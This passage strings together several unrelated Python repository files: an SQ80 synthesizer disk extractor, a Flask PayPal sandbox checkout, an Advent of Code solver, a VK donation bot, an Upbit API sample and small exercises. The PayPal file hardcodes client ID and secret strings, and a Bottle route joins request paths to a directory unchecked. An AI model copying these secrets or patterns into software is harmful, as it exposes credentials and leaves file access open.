({})\".format(program_data[0:6],directory.progs()[prog_num]))\n return program_data\n\ndef dump_prog(prog_data,dump_file):\n \"\"\"\n dump the program binary data in prog_data to dump_file\n \"\"\"\n\n if args.dump=='syx':\n data_out=bytearray(b'\\xf0\\x0f\\x02\\x00') # SQ80 SYS EX HEADER / CH0\n data_out+=b'\\x01' # single program dump\n\n for b in prog_data:\n data_out+=bytes([b&0x0f, b>>4])\n\n data_out+=b'\\xf7' # end of exclusive\n\n else:\n data_out=prog_data\n\n with open(dump_file,\"bx\") as outfile:\n outfile.write(data_out)\n\ndef mode_prog():\n \"\"\"\n Single program mode\n \"\"\"\n\n if (args.dump):\n print(\"Dumping individual program/s...\")\n else:\n print(\"Listing individual program/s...\")\n\n if args.number:\n assert(args.number>0 and args.number<=128)\n\n # in list mode (if not 
dumping and no number selected), progs are output 5\n # to a line (like for virtbanks) to allow for more concise listings of\n # disks to be generated\n\n printed_flag=False\n for (prog_num,prog_name_raw) in enumerate(directory.progs()):\n if args.list and not args.number and not args.dump and not (prog_num)% 5 and printed_flag:\n printed_flag=False\n print('')\n\n if args.number and prog_num != args.number - 1: # internally, prog numbers count from 0\n continue\n\n if prog_name_raw is None:\n if (args.number):\n raise RuntimeError(\"Specified prog number appears to be blank\")\n continue; \n\n prog_name=sqbytes_to_ascii(prog_name_raw)\n\n dump_file=\"{}{:03}_{}\".format(args.prefix or \"PROG\",prog_num+1,re.sub(r' *$','',prog_name))\n\n if args.dump=='syx':\n dump_file+='.syx'\n else:\n dump_file+='.bin'\n\n if args.dump:\n print(\" PROG {:2} - {} -> {}\".format(prog_num+1,prog_name,dump_file))\n\n prog_data=read_prog(prog_num)\n dump_prog(prog_data,dump_file)\n else:\n if args.number or not args.list: \n print(\" PROG {:2} - {}\".format(prog_num+1,prog_name))\n else:\n printed_flag=True\n print(\" {:03}:{: <8}\".format(prog_num+1,prog_name),end=\"\")\n\n if args.list and not args.number and not args.dump and printed_flag:\n print('')\n\n return\n \n\ndef mode_bank():\n \"\"\"\n Bank mode \n \"\"\"\n\n if (args.dump):\n print(\"Dumping bank/s...\")\n else:\n print(\"Listing bank/s...\")\n\n # iterate over banks and list/dump them\n\n if args.number:\n assert(args.number>0 and args.number<=40)\n\n for (bank_num,bank) in enumerate(directory.banks()): \n if args.number and bank_num != args.number - 1: # internally, bank numbers count from 0\n continue\n \n if bank is None:\n if (args.number) :\n raise RuntimeError(\"Specified bank number doesn't exist\")\n continue\n\n bank=re.sub(r'\\.*','',bank)\n bank=re.sub(r'/','_',bank)\n\n dump_file=\"{}{:02}_{}\".format(args.prefix or \"BANK\",bank_num+1,bank)\n if args.dump=='syx':\n dump_file+='.syx'\n else:\n dump_file+='.bin'\n\n if args.dump:\n print(\" BANK {:2} - {} -> {}\".format(bank_num+1,bank,dump_file))\n bank_data=read_bank(bank_num)\n\n # do this to trigger to disk corruption check in sqbytes_to_ascii\n for prog_num in (range(0,40)):\n prog_name=sqbytes_to_ascii(bank_data[prog_num*102:prog_num*102+6])\n \n dump_bank(read_bank(bank_num),dump_file)\n\n elif args.list:\n print(\"BANK {:2} - {}\".format(bank_num+1,bank))\n bank_data=read_bank(bank_num)\n for prog_num in (range(0,40)):\n if prog_num and not prog_num % 5:\n print('')\n prog_name=sqbytes_to_ascii(bank_data[prog_num*102:prog_num*102+6])\n print(\" {:03}:{: <8}\".format(prog_num+1,prog_name),end=\"\")\n print('')\n else:\n print(\" BANK {:2} - {}\".format(bank_num+1,bank))\n\n return\n\ndef mode_virtbank():\n \"\"\"\n virtual bank mode\n \"\"\"\n\n print(\"Listing virtual bank contents...\")\n\n bank_num=0\n bank_prog_num=0\n bank_data=b''\n banks=[]\n\n for (prog_num,prog_name_raw) in enumerate(directory.progs()):\n\n if prog_name_raw is None:\n continue\n\n bank_name=\"VIRTBANK{:02}\".format(bank_num+1)\n\n showing_flag = not args.number or args.number-1 == bank_num\n\n if showing_flag:\n if not bank_prog_num:\n print(bank_name)\n\n prog_name=sqbytes_to_ascii(prog_name_raw)\n print(\" {:03}:{: <8}\".format(prog_num+1,prog_name),end=\"\")\n\n bank_data += read_prog(prog_num)\n\n bank_prog_num = (bank_prog_num + 1) % 40\n \n if not bank_prog_num:\n banks.append((bank_num,bank_name,bank_data))\n bank_num+=1\n bank_data=b''\n if showing_flag and not bank_prog_num % 5:\n 
print('')\n\n if bank_prog_num: # pad out incomplete banks with the init patch\n bank_data += INIT_PROG * (40-bank_prog_num)\n banks.append((bank_num,bank_name,bank_data))\n\n if args.number and args.number-1 > bank_num:\n print(bank_num)\n raise RuntimeError(\"No such virtual bank\")\n\n print()\n if (args.dump):\n print(\"Dumping virtual bank/s...\")\n\n for (bank_num,bank_name,bank_data) in banks:\n if args.number and args.number-1 != bank_num:\n continue\n dump_file=\"{}{:02}\".format(args.prefix or \"VIRTBANK\",bank_num+1)\n if args.dump=='syx':\n dump_file+='.syx'\n else:\n dump_file+='.bin'\n\n print(\" {} -> {}\".format(bank_name,dump_file))\n dump_bank(bank_data,dump_file)\n\n\n#--------------------\n# main body\n#--------------------\n\nif __name__ == '__main__':\n\n # parse arguments\n\n parser = argparse.ArgumentParser(description=\"Dump program banks or individual programs from an SQ80 disk dump file as either literal binary, or SYSEX format. File names for the dump files are automatically generated from the bank/program number and name stored in the disk directory.\")\n parser.add_argument('imagefile',type=argparse.FileType('rb') ,help='The source SQ80 disk image file')\n parser.add_argument('mode',choices=['bank','prog','virtbank'],help='bank: Program bank mode. Dump/list one or all of the 40 program banks. prog: Single program mode. Dump/list one or all of the 128 single programs as individual files. virtbank: Virtual bank mode. Dump/list the 128 single programs as up to 5 virtual banks. Empty program positions in the virtual banks are filled using an init patch with a blank name.\\n')\n #parser.add_argument('--indiv','-i',help='',action='store_true')\n parser.add_argument('--number','-n',type=int,help='The number of the bank/prog/virtbank to list or dump. Otherwise all will be dumped.')\n parser.add_argument('--dump','-d',help='Actually dump the banks/programs/virtbanks (otherwise they are only listed). The parameter should be either \"syx\" or \"bin\". \"syx\" is a SYSEX file that can be output straight to the SQ80 via a midi port. \"bin\" is a literal binary dump of the bank/program.',choices=['syx','bin'])\n parser.add_argument('--prefix','-p',help='Prefix to add to output filenames. Can specify directories than the current using a / in the prefix',action='store')\n parser.add_argument('--list','-l',help='Used to generate listings of programs on a disk in a more concise format (5 programs per line). Can be used in bank mode to list the programs within each bank. 
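The disk-geometry arithmetic earlier in this record (`chs_to_offset`) is the key to the whole extractor: a 10-byte header, then tracks of 5*1024+512 bytes per (cylinder, head), then 1024-byte sectors. A standalone restatement with sanity checks; the constants follow the formula in the record itself, not an independent SQ80 spec.

```python
# Standalone restatement of the CHS -> file-offset arithmetic used above.
HEADER = 10              # '!SQ80DISK!' file header
TRACK = 5 * 1024 + 512   # bytes per (cylinder, head) track
SECTOR = 1024            # bytes per sector

def chs_to_offset(c, h, s):
    assert 0 <= c < 80 and 0 <= h < 2 and 0 <= s < 6
    return HEADER + (c * 2 + h) * TRACK + s * SECTOR

assert chs_to_offset(0, 0, 0) == 10
assert chs_to_offset(0, 1, 0) == 10 + TRACK
assert chs_to_offset(1, 0, 2) == 10 + 2 * TRACK + 2 * SECTOR
```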
Virtbank mode uses the concise format by default, so this flag does nothing.',action='store_true')\n\n args = parser.parse_args()\n if args.number == 0 :\n raise RuntimeError(\"banks/programs count from 1 upwards\")\n\n if args.list and args.dump:\n raise RuntimeError(\"Cannot select --list and --dump at the same time.\")\n\n # check disk image file\n\n header=args.imagefile.read(10)\n if (header != b'!SQ80DISK!'):\n raise RuntimeError(\"Doesn't appear to be a valid SQ80 dump file\")\n\n # read directory\n\n directory_buf=bytearray()\n\n for (c,h,s) in [(0,0,5),(0,1,5),(1,1,5),(1,0,5)]:\n args.imagefile.seek(chs_to_offset(c,h,s))\n directory_buf+=args.imagefile.read(512)\n\n directory=directory(directory_buf)\n\n print(\"SQ80 Disk Image File:\",args.imagefile.name)\n\n if args.mode == 'prog':\n mode_prog()\n elif args.mode == 'bank':\n mode_bank()\n elif args.mode == 'virtbank':\n mode_virtbank()\n","repo_name":"voytekl/protozoid_sq80","sub_path":"extract_sq80.py","file_name":"extract_sq80.py","file_ext":"py","file_size_in_byte":14848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"20313600591","text":"from flask import Flask, render_template, jsonify, request\nimport paypalrestsdk\n\napp = Flask(__name__)\n\npaypalrestsdk.configure({\n \"mode\": \"sandbox\", # sandbox or live\n # CHANGE THIS PART\n \"client_id\": \"AQAo5U4GVQPwJ-pYrultYc5UsQXap7JI1eCjpfL2Bhy7mUau1hVY9BSEnOc3dIYOIFdAnu_C8bbciG2p\",\n \"client_secret\": \"EHU2C0gfNoFH6lLLknJsAYKyzlJ_oj_cYg7eg7uyuIn_qTn8CjVztWNgiJjh1_2X3qD-drZVMIKVoRca\" })\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/payment', methods=['POST'])\ndef payment():\n data = request.get_json()\n payment = paypalrestsdk.Payment({\n \"intent\": \"sale\",\n \"payer\": {\n \"payment_method\": \"paypal\"},\n \"redirect_urls\": {\n \"return_url\": \"http://localhost:3000/payment/execute\",\n \"cancel_url\": \"http://localhost:3000/\"},\n \"transactions\": [{\n # \"item_list\": {\n # \"items\": [{\n # \"name\": \"testitem\",\n # \"sku\": \"12345\",\n # \"price\": \"500.00\",\n # \"currency\": \"USD\",\n # \"quantity\": 1}]},\n \"amount\": {\n \"total\": data['total'],\n \"currency\": \"USD\"},\n \"description\": \"This is the payment transaction description.\"}]})\n\n if payment.create():\n print('Payment success!')\n else:\n print(payment.error)\n\n return jsonify({'paymentID' : payment.id})\n\n@app.route('/execute', methods=['POST'])\ndef execute():\n success = False\n\n payment = paypalrestsdk.Payment.find(request.form['paymentID'])\n\n if payment.execute({'payer_id' : request.form['payerID']}):\n print('Execute success!')\n success = True\n #amqp to cart\n else:\n print(payment.error)\n\n return jsonify({'success' : success})\n\nif __name__ == '__main__':\n app.run(port=5008, debug=True)","repo_name":"GeralynSoochi/ESD","sub_path":"payment - Copy.py","file_name":"payment - Copy.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30793905178","text":"# Code Solution for day 18\n#Time 2022-09-28\nfrom ast import literal_eval\n\n\n# define basic tree data structure\nclass snailfish:\n def __init__(self, data=-1, level = 0, pair=False):\n self.data = data\n self.level = level\n self.pair = pair\n self.left = None\n self.right = None\n self.parent = None\n\n def add_leftchild(self, data= -1, level=0, pair= False):\n self.left = snailfish(data, level, pair)\n 
self.left.parent = self\n\n def add_rightchild(self, data= -1, level=0, pair= False):\n self.right = snailfish(data, level, pair)\n self.right.parent = self\n\n def add_leftnode(self, node):\n self.left = node\n self.left.parent = self\n\n def add_rightnode(self, node):\n self.right = node\n self.right.parent = self\n\n def get_data(self):\n return self.data\n\n def get_level(self):\n return self.level\n\n def is_pair(self):\n return self.pair\n\n\nclass Solution:\n def __init__(self, file):\n self.input = open(file, 'r').read().splitlines()\n self.numbers = [literal_eval(line) for line in self.input]\n\n @staticmethod\n def build_tree(number):\n root = snailfish(level=0,pair=True)\n queue = [(root, number)]\n while len(queue) > 0:\n current, number = queue.pop(0)\n left, right = number\n if isinstance(left, int):\n current.add_leftchild(data=left, level=current.level+1, pair=False)\n else:\n current.add_leftchild(data=-1, level=current.level+1, pair=True)\n queue.append((current.left, left))\n if isinstance(right, int):\n current.add_rightchild(data=right, level=current.level+1, pair=False)\n else:\n current.add_rightchild(data=-1, level=current.level+1, pair=True)\n queue.append((current.right, right))\n return root\n\n @staticmethod\n def addition(root1, root2):\n root = snailfish(level=0,pair=True)\n root.add_leftnode(root1)\n root.add_rightnode(root2)\n queue = [root]\n # update level\n while len(queue) > 0:\n current = queue.pop(0)\n if current.left is not None:\n current.left.level = current.level + 1\n queue.append(current.left)\n if current.right is not None:\n current.right.level = current.level + 1\n queue.append(current.right)\n return root\n\n @staticmethod\n def explode(node: snailfish):\n # explosion of one node\n assert node.left.pair is False\n assert node.right.pair is False\n left_value, right_value = node.left.data, node.right.data\n node.pair = False\n node.data = 0\n node.left.parent = None\n node.right.parent = None\n node.left = None\n node.right = None\n\n current = node\n parent = node.parent\n # update left_value, right_value\n if parent:\n while parent.left == node:\n node = parent\n parent = node.parent\n if parent is None:\n break\n\n if parent is not None:\n node = parent.left\n # find rightmost node\n while node.pair:\n node = node.right\n node.data += left_value\n\n node = current\n parent = node.parent\n if parent:\n while parent.right == node:\n node = parent\n parent = node.parent\n if parent is None:\n break\n\n if parent is not None:\n node = parent.right\n # find leftmost node\n while node.pair:\n node = node.left\n node.data += right_value\n\n @staticmethod\n def split(node: snailfish):\n # split of one node\n assert node.pair is False\n left_value, right_value = node.data // 2, node.data - node.data // 2\n node.pair = True\n node.data = -1\n node.add_leftchild(left_value, node.level + 1, False)\n node.add_rightchild(right_value, node.level + 1, False)\n\n @staticmethod\n def print_tree(root: snailfish):\n queue = [root]\n # print tree in BFS\n print('Tree result in BFS')\n while len(queue)>0:\n current = queue.pop(0)\n if current.pair:\n print('Pair {}'.format(current.level), end=' ,')\n else:\n print('Data {}:'.format(current.level), current.data, end=' ,')\n if current.left is not None:\n queue.append(current.left)\n if current.right is not None:\n queue.append(current.right)\n print()\n\n @staticmethod\n def lmr_explode(root: snailfish):\n if root.left.is_pair():\n if Solution.lmr_explode(root.left):\n return True\n # first check if apply to 
explode\n if root.is_pair():\n if root.level >= 4:\n #print('Explode node: [{}, {}] at level {}'.format(root.left.data, root.right.data, root.level))\n Solution.explode(root)\n return True\n\n if root.right.is_pair():\n if Solution.lmr_explode(root.right):\n return True\n\n @staticmethod\n def lmr_split(root:snailfish):\n if root.left is not None:\n if Solution.lmr_split(root.left):\n return True\n\n if root.is_pair() is False:\n if root.data >= 10:\n Solution.split(root)\n return True\n\n if root.right is not None:\n if Solution.lmr_split(root.right):\n return True\n\n @staticmethod\n def magnitude(root):\n if not root.pair:\n return root.data\n else:\n return 3 * Solution.magnitude(root.left) + 2 * Solution.magnitude(root.right)\n\n def part1(self):\n # lmr traversal in tree\n left = None\n for number in self.numbers:\n if left is None:\n left = self.build_tree(number)\n continue\n right = self.build_tree(number)\n root = self.addition(left, right)\n # reduce process\n while True:\n # first check all the exploding condition\n flag = None\n while self.lmr_explode(root) is not None:\n pass\n #then check if exists any splitting condition\n flag = self.lmr_split(root)\n if flag is None:\n break\n left = root\n # print('After update')\n # Solution.print_tree(root)\n\n return Solution.magnitude(root)\n\n def reduce(self, left: snailfish, right: snailfish):\n lr = self.addition(left, right)\n\n while True:\n flag = None\n while self.lmr_explode(lr) is not None:\n pass\n\n flag = self.lmr_split(lr)\n if flag is None:\n break\n\n return lr\n\n def part2(self):\n magnitude = 0\n # O(n^2)\n for i in range(len(self.numbers)):\n for j in range(len(self.numbers)):\n if i == j:\n continue\n left = self.build_tree(self.numbers[i])\n right = self.build_tree(self.numbers[j])\n result= self.reduce(left, right)\n magnitude = max(magnitude, Solution.magnitude(result))\n\n return magnitude\n\n\nif __name__ == \"__main__\":\n s = Solution('input.txt')\n print(s.part1())\n print(s.part2())\n","repo_name":"dengkaiDK/adventofcode","sub_path":"2021/day18/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":7655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35271372489","text":"import pandas\nimport sys\n\nif len(sys.argv) < 2:\n print(\"Usage: \" + sys.argv[0] + \" []\")\n exit()\n\nis_first = True\nchunks = pandas.read_csv(sys.argv[1], engine='python', sep=None, keep_default_na=False, chunksize=1000000)\nfor chunk in chunks:\n if (is_first):\n # First chunk - print width and column names\n input()\n print(chunk.shape[1])\n for i in range(chunk.shape[1]):\n input()\n print(chunk.columns[i])\n is_first = False\n # Every chunk - print height and cells\n input()\n print(chunk.shape[0])\n for i in range(chunk.shape[0]):\n for j in range(chunk.shape[1]):\n input()\n print(chunk.iloc[i][j])\ninput()\nprint(-1)","repo_name":"erased-generic/py-table","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"29695424727","text":"p=1\r\nwhile(p==1):\r\n n = int(input(\"Enter the no. 
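The `magnitude()` method at the end of the day-18 record above is easiest to sanity-check without the tree machinery: the same recursion works directly on the nested lists that `literal_eval` produces. A minimal sketch, using a known value from the puzzle statement:

```python
# Magnitude of a snailfish number, computed straight off nested lists.
from ast import literal_eval

def magnitude(number):
    if isinstance(number, int):
        return number
    left, right = number
    return 3 * magnitude(left) + 2 * magnitude(right)

assert magnitude(literal_eval('[[1,2],[[3,4],5]]')) == 143
```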
of elements in list: \"))\r\n l = []\r\n print('Enter elements of the list: ')\r\n for i in range(n):\r\n l.append(int(input()))\r\n# reversing the list using l[::-1]\r\n# comparing reversed list with user entered list\r\n if l == l[::-1]:\r\n print(\"It is a palindrome\")\r\n else:\r\n print(\"Not a palindrome\")\r\n flag=0\r\n while(flag == 0):\r\n p = int(input(\"Enter 1 to continue and 0 to exit : \"))\r\n if(p!=1 and p!=0):\r\n print(\"Invalid entry\")\r\n if(p==1 or p==0):\r\n flag=1\r\n","repo_name":"srimedhabc/ITT-lab","sub_path":"ITT-lab/lab5/Lab5qd.py","file_name":"Lab5qd.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"4352380589","text":"#!/usr/bin/env python\n\"\"\"@package docstring\n@brief\tconverter_f2i verilog test\n@details get data compared to cpp and verilog\n\"\"\"\nif __name__ == \"__main__\":\n from Test_Converter.Test_Converter import TestConverter\n from sys import exit\n\n converter_test = TestConverter(converter_type=1, test_title=\"Converter_F2I_Test\",\n cpp_execute_file=\"../cmake-build-debug/Converter_F2I/Converter_F2I_CPP/converter_f2i\"\n )\n converter_test.set_output_file_verilog(\"../Data/Converter_F2I/Output_Z_Verilog\")\n converter_test.set_cpp_execute_file(\"../cmake-build-debug/Converter_F2I/Converter_F2I_CPP/converter_f2i\")\n converter_test.set_verilog_compile_list(\"./Stimulus/file_reader.v ./Stimulus/file_writer.v \"\n \"./Stimulus/test_bench.v ./Stimulus/test_bench_tb.v \"\n \"./Source/converter_f2i.v\")\n if converter_test.run_test() == 1:\n converter_test.compare_output(\"../Data/Converter_F2I/\")\n exit(1)\n else:\n exit(-1)\n","repo_name":"wjdwls0630/khu_sensor","sub_path":"00_RTL_Design/Source/Filter_Test/Filter_Test_Verilog/Converter_F2I/converter_f2i_test.py","file_name":"converter_f2i_test.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"6317463341","text":"import vk_api\nfrom vk_api.utils import get_random_id\nfrom vk_api.bot_longpoll import VkBotLongPoll, VkBotEventType\nimport json\nfrom Db import Db\nfrom qiwiActions import invoice, pay_status\nfrom datetime import datetime\nfrom time import sleep\nfrom threading import Thread\nfrom dvach import po_random_comment\n\nwith open('config.json') as config:\n conf_data = json.load(config)\nQIWI_SECRET = conf_data['qiwi_cash_secret_key']\n\nvk_session = vk_api.VkApi(token=conf_data['vk_api_token'])\nvk = vk_session.get_api()\nlongpoll = VkBotLongPoll(vk_session, conf_data['vk_group_id'])\n\ndonate_amount = 200\n\nmonths = ['', 'январь', 'февраль', 'март', 'апрель', 'май', 'июнь', 'июль', 'август', 'сентябрь', 'октябрь', 'ноябрь',\n 'декабрь']\n\n\ndef answer_vk_message(event, text):\n vk.messages.send(\n random_id=get_random_id(),\n user_id=event.message['peer_id'],\n message=text\n )\n\n\ndef answer_vk_chat(event, text):\n vk.messages.send(\n random_id=get_random_id(),\n chat_id=event.chat_id,\n message=text\n )\n\n\ndef send_vk_message(person_id, text):\n vk.messages.send(\n random_id=get_random_id(),\n user_id=person_id,\n message=text\n )\n\n\ndef become_donator(db, event):\n id = event.message['peer_id']\n person = db.get_person(id)\n answer = 'Подписка на ежемесячные уведомления о взносах успешно оформлена'\n if not person:\n db.insert_person(id, True)\n else:\n if person['is_donater'] is False:\n db.update_donater_status(id, True)\n else:\n answer = 'Вы уже подписаны на 
уведомления о взносах'\n answer_vk_message(event, answer)\n if not db.did_person_get_invoice_this_month(id):\n answer = form_new_payment(db, id, donate_amount)\n answer_vk_message(event, answer)\n\n\ndef stop_being_donator(db, event):\n id = event.message['peer_id']\n person = db.get_person(id)\n answer = 'Вы не подписаны на уведомления о взносах'\n if person:\n if person['is_donater'] is True:\n db.update_donater_status(id, False)\n answer = 'Подписка на ежемесячные уведомления о взносах прекращена(('\n answer_vk_message(event, answer)\n\n\ndef show_debt(db, event):\n id = event.message['peer_id']\n person = db.get_person(id)\n if not person:\n answer = 'Вы не подписаны на получение уведомлений о взносах. \\n' + \\\n 'Для того, чтобы стать жертвователем, наберите команду donate'\n else:\n update_person_payments_statuses(db, id)\n debts = list(db.select_person_debt(id))\n if not debts:\n answer = 'У вас нет неоплаченных долгов :)'\n else:\n debt_urls = [debt['url'] for debt in debts]\n answer = 'Текущие долги: \\n' + \\\n '\\n'.join([debt_url for debt_url in debt_urls])\n answer_vk_message(event, answer)\n\n\ndef update_person_payments_statuses(db, id):\n debts = db.select_person_debt(id)\n for debt in debts:\n payment_id = debt['id']\n if pay_status(payment_id, QIWI_SECRET) == db.PAID:\n db.update_payment_status(payment_id, db.PAID)\n\n\ndef send_invoice(db, event):\n id = event.message['peer_id']\n answer = form_new_payment(db, id, donate_amount)\n answer_vk_message(event, answer)\n\n\ndef send_command_list(event):\n answer = \"\"\"\n Список команд бота:\n \n 𝐃𝐨𝐧𝐚𝐭𝐞 - получать ежемесячные уведомления о взносах\n 𝐒𝐭𝐨𝐩 𝐝𝐨𝐧𝐚𝐭𝐞 - отписаться от ежемесячных уведомлений о взносах\n 𝐃𝐞𝐛𝐭 - проверить наличие долгов по взносам\n \"\"\"\n answer_vk_message(event, answer)\n\n\ndef send_monthly_notification_to_donaters(db):\n donaters = db.select_donaters()\n for donater in donaters:\n id = donater['id']\n if not db.did_person_get_invoice_this_month(id):\n message = form_new_payment(db, id, donate_amount)\n send_vk_message(id, message)\n\n\ndef send_weekly_debt_reminder_to_donaters(db):\n donaters = db.select_donaters()\n for donater in donaters:\n id = donater['id']\n update_person_payments_statuses(db, id)\n debts = list(db.select_person_debt(id))\n if debts:\n debt_urls = [debt['url'] for debt in debts]\n message = 'Не забываем про долги =) \\n' + '\\n'.join([debt_url for debt_url in debt_urls])\n send_vk_message(id, message)\n\n\n\ndef form_new_payment(db, person_id, donate_amount):\n payment_id = db.get_new_payment_id()\n invoice_url = invoice(payment_id, donate_amount, QIWI_SECRET)\n _, date = db.insert_payment(person_id, donate_amount, invoice_url)\n answer = '\\n Новая платежка за ' + months[date.month] + ' ' + str(date.year) + '\\n' + invoice_url\n return answer\n\n\ndef bot_main():\n db = Db()\n for event in longpoll.listen():\n if event.type == VkBotEventType.MESSAGE_NEW:\n if event.from_user:\n if event.message['text'].lower() == 'donate':\n become_donator(db, event)\n elif event.message['text'].lower() == 'stop donate':\n stop_being_donator(db, event)\n elif event.message['text'].lower() == 'debt':\n show_debt(db, event)\n elif event.message['text'].lower() == 'invoice123':\n send_invoice(db, event)\n else:\n send_command_list(event)\n elif event.from_chat:\n if event.message['text'].lower() == '/po' or \\\n event.message['text'].lower() == '/по' or \\\n event.message['text'].lower() == '/ро':\n answer_vk_chat(event, po_random_comment())\n\n\ndef mailing():\n db = Db()\n 
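The `mailing()` loop above gates its monthly send on two things: the wall-clock month changing and a persisted "already mailed this month" record. That gate is a small pure predicate; here is a sketch with the database swapped for a plain set so the logic is testable in isolation (the set stands in for `Db.is_mailing_exist` / `insert_mailing`).

```python
# The month-gate from the mailing loop, isolated from VK/QIWI/the database.
from datetime import datetime

sent = set()  # stands in for the persisted mailing table

def should_send_monthly(now: datetime, earliest_hour: int = 19) -> bool:
    """True at most once per (month, year), and only after earliest_hour."""
    key = (now.month, now.year)
    if now.hour < earliest_hour or key in sent:
        return False
    sent.add(key)
    return True

assert should_send_monthly(datetime(2021, 3, 1, 20))       # first call fires
assert not should_send_monthly(datetime(2021, 3, 15, 21))  # same month: no
assert should_send_monthly(datetime(2021, 4, 1, 19))       # new month fires
```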
last_mailing_month = 0\n last_debt_mailing_week = 0\n while True:\n now = datetime.now()\n if now.hour >= 19:\n current_week = now.isocalendar()[1]\n if now.weekday() == 0 and last_debt_mailing_week != current_week:\n send_weekly_debt_reminder_to_donaters(db)\n last_debt_mailing_week = current_week\n if last_mailing_month != now.month:\n if not db.is_mailing_exist(now.month, now.year):\n send_monthly_notification_to_donaters(db)\n db.insert_mailing(now.month, now.year, True)\n last_mailing_month = now.month\n\n sleep(1800)\n\n\nif __name__ == '__main__':\n thread_pool = {\n 'chat_bot': Thread(target=bot_main),\n 'mailing': Thread(target=mailing)\n }\n\n for thread in thread_pool:\n thread_pool[thread].start()\n\n while True:\n sleep(10)\n for thread in thread_pool:\n if not thread_pool[thread].is_alive():\n if thread == 'chat_bot':\n thread_pool[thread] = Thread(target=bot_main)\n if thread == 'mailing':\n thread_pool[thread] = Thread(target=mailing)\n thread_pool[thread].start()\n","repo_name":"MikhaelMIEM/donations_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30865862682","text":"class Solution:\n def maxArea(self, H: List[int]) -> int:\n # [1,8,6,2,5,4,8,3,7]\n maxA=0\n i=0\n j = len(H)-1\n while (i < j):\n if H[i] <= H[j]:\n area = H[i] * (j - i)\n i += 1\n else:\n area = H[j] * (j - i)\n j -= 1\n if area > maxA:\n maxA = area\n return maxA\n\n\n# https://leetcode.com/problems/container-with-most-water/\n","repo_name":"mintesnot96/competitive-Programming-A2SV","sub_path":"11. Container With Most Water leetcode DSA.py","file_name":"11. Container With Most Water leetcode DSA.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"41457409501","text":"N, K =map(int, input().split())\ncoins=[]\nfor i in range(N):\n coin =int(input())\n if coin K:\n target = coins.pop()\n share = K//target\n answer+=share\n K-=share*target\nprint(answer) \n","repo_name":"AlgorithmOnline/jaeeun","sub_path":"2_20201029.py","file_name":"2_20201029.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"34629745531","text":"import requests\nurl = \"https://api.upbit.com/v1/orderbook\"\nquerystring = {\"markets\":\"KRW-BTC\"}\nresponse = requests.request(\"GET\", url, params=querystring)\nprint(response.text)\n\n\nimport os\nimport jwt\nimport uuid\nimport hashlib\nfrom urllib.parse import urlencode\n\nimport requests\n\nserver_url = 'https://api.upbit.com'\nf = open(\"../upbit_api_key.txt\", 'r')\naccess_key = f.readline().rstrip()\nsecret_key = f.readline().rstrip()\nf.close()\n#up = Coin('upbit',access_key,secret_key)\n\npayload = {\n 'access_key': access_key,\n 'nonce': str(uuid.uuid4()),\n}\n\njwt_token = jwt.encode(payload, secret_key).decode('utf-8')\nauthorize_token = 'Bearer {}'.format(jwt_token)\nheaders = {\"Authorization\": authorize_token}\n\nres = requests.get(server_url + \"/v1/accounts\", headers=headers)\n\nprint(res.json())","repo_name":"sevity/coin_strategy","sub_path":"exchange/upbit/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"43"} +{"seq_id":"72818680769","text":"# Melhore o \"ex061\", perguntando para o usuário se ele 
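The `maxArea` record above is the classic two-pointer "container with most water" scan: always move the shorter wall inward, since keeping it can never yield a larger area. A self-contained version, checked against the standard sample input:

```python
# Two-pointer container-with-most-water, outside the LeetCode class wrapper.
def max_area(heights):
    best, i, j = 0, 0, len(heights) - 1
    while i < j:
        best = max(best, min(heights[i], heights[j]) * (j - i))
        # Advance the shorter side: moving the taller one cannot help.
        if heights[i] <= heights[j]:
            i += 1
        else:
            j -= 1
    return best

assert max_area([1, 8, 6, 2, 5, 4, 8, 3, 7]) == 49
```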
quer mostrar mais alguns termos.\n# O programa encerrará quando ele disser que quer mostrar 0 termos.\n\nprimeiro = int(input('Primeiro termo: '))\nrazao = int(input('Razão: '))\ntermo = primeiro\nc = 1\ntot = 0\nmais = 10\n\nwhile mais != 0:\n tot += mais\n\n while c <= tot:\n print(f'{termo} → ', end='')\n\n termo += razao\n c += 1\n\n print('PAUSA')\n\n mais = int(input('Quantos termos você quer mostrar a mais? '))\n\nprint('FIM')\n","repo_name":"gabazevdo/python","sub_path":"Curso_em_Vídeo/mundo2_estruturas_de_controle/ex062-super_progressao_aritmetica.py","file_name":"ex062-super_progressao_aritmetica.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19759253375","text":"#!/usr/bin/python\n\nfrom bottle import Bottle, run, template, static_file\nfrom dircache import listdir\nfrom os import sep\n\nprism = Bottle()\n\n# Testing ...\n@prism.route('/')\n@prism.route('/hello')\n@prism.route('/hello/')\ndef hello(name='Stranger'):\n return template('Hello {{name}}, how are you today?', name=name)\n\n# Testing ...\n@prism.route('/Photographs')\n@prism.route('/Photographs/')\ndef send_dir(directory=''):\n path = photos_base_dir + sep + directory\n #return template('I will send you path: {{path}}', path=path)\n return listdir(path)\n\n# Display a photo\n@prism.route('/Photographs/')\ndef 